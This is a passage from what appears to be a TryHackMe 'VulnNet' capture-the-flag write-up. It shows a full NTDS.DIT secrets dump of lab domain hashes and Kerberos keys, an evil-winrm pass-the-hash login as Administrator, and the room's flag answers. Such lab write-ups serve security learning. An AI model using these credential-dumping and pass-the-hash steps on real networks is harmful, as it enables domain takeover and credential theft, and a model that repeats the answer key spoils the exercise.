[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::
vulnnet-rst.local\enterprise-core-vn:1104:aad3b435b51404eeaad3b435b51404ee:8752ed9e26e6823754dce673de76ddaf:::
vulnnet-rst.local\a-whitehat:1105:aad3b435b51404eeaad3b435b51404ee:1bd408897141aa076d62e9bfc1a5956b:::
vulnnet-rst.local\t-skid:1109:aad3b435b51404eeaad3b435b51404ee:49840e8a32937578f8c55fdca55ac60b:::
vulnnet-rst.local\j-goldenhand:1110:aad3b435b51404eeaad3b435b51404ee:1b1565ec2b57b756b912b5dc36bc272a:::
vulnnet-rst.local\j-leet:1111:aad3b435b51404eeaad3b435b51404ee:605e5542d42ea181adeca1471027e022:::
WIN-2BO8M1OE1M1$:1000:aad3b435b51404eeaad3b435b51404ee:70d01ee15ee1ff5e17b1689bf257825b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:7f9adcf2cb65ebb5babde6ec63e0c8165a982195415d81376d1f4ae45072ab83
Administrator:aes128-cts-hmac-sha1-96:d9d0cc6b879ca5b7cfa7633ffc81b849
Administrator:des-cbc-md5:52d325cb2acd8fc1
krbtgt:aes256-cts-hmac-sha1-96:a27160e8a53b1b151fa34f45524a07eb9899ebdf0051b20d677f0c3b518885bd
krbtgt:aes128-cts-hmac-sha1-96:75c22aac8f2b729a3a5acacec729e353
krbtgt:des-cbc-md5:1357f2e9d3bc0bd3
vulnnet-rst.local\enterprise-core-vn:aes256-cts-hmac-sha1-96:9da9e2e1e8b5093fb17b9a4492653ceab4d57a451bd41de36b7f6e06e91e98f3
vulnnet-rst.local\enterprise-core-vn:aes128-cts-hmac-sha1-96:47ca3e5209bc0a75b5622d20c4c81d46
vulnnet-rst.local\enterprise-core-vn:des-cbc-md5:200e0102ce868016
vulnnet-rst.local\a-whitehat:aes256-cts-hmac-sha1-96:f0858a267acc0a7170e8ee9a57168a0e1439dc0faf6bc0858a57687a504e4e4c
vulnnet-rst.local\a-whitehat:aes128-cts-hmac-sha1-96:3fafd145cdf36acaf1c0e3ca1d1c5c8d
vulnnet-rst.local\a-whitehat:des-cbc-md5:028032c2a8043ddf
vulnnet-rst.local\t-skid:aes256-cts-hmac-sha1-96:a7d2006d21285baee8e46454649f3bd4a1790c7f4be7dd0ce72360dc6c962032
vulnnet-rst.local\t-skid:aes128-cts-hmac-sha1-96:8bdfe91cca8b16d1b3b3fb6c02565d16
vulnnet-rst.local\t-skid:des-cbc-md5:25c2739dcb646bfd
vulnnet-rst.local\j-goldenhand:aes256-cts-hmac-sha1-96:fc08aeb44404f23ff98ebc3aba97242155060928425ec583a7f128a218e4c5ad
vulnnet-rst.local\j-goldenhand:aes128-cts-hmac-sha1-96:7d218a77c73d2ea643779ac9b125230a
vulnnet-rst.local\j-goldenhand:des-cbc-md5:c4e65d49feb63180
vulnnet-rst.local\j-leet:aes256-cts-hmac-sha1-96:1327c55f2fa5e4855d990962d24986b63921bd8a10c02e862653a0ac44319c62
vulnnet-rst.local\j-leet:aes128-cts-hmac-sha1-96:f5d92fe6dc0f8e823f229fab824c1aa9
vulnnet-rst.local\j-leet:des-cbc-md5:0815580254a49854
WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:f8b73352bb3a234efac83be9bd4c507511d6ba4a17ac9206fdf3aa8996755537
WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:e54122b0bca35b8f3b3e382663b6494d
WIN-2BO8M1OE1M1$:des-cbc-md5:3bdf456be5f72cd6
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

using hash admin

┌──(root㉿kali)-[/home/kali/VulnNet]
└─# evil-winrm -i 10.10.169.84 -u Administrator -H 'c2597747aa5e43022a3a3049a3c3b09d' -N

Evil-WinRM shell v3.4

Warning: Remote path completion is disabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd \Desktop
Cannot find path 'C:\Desktop' because it does not exist.
At line:1 char:1
+ cd \Desktop
+ ~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Desktop:String) [Set-Location], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand

*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:34 PM             39 system.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}


```



	What is the user flag? (Desktop\user.txt)  

*THM{726b7c0baaac1455d05c827b5561f4ed}*

	What is the system flag? (Desktop\system.txt)

*THM{16f45e3934293a57645f8d7bf71d8d4c}*


[[VulnNet Internal]]

Last updated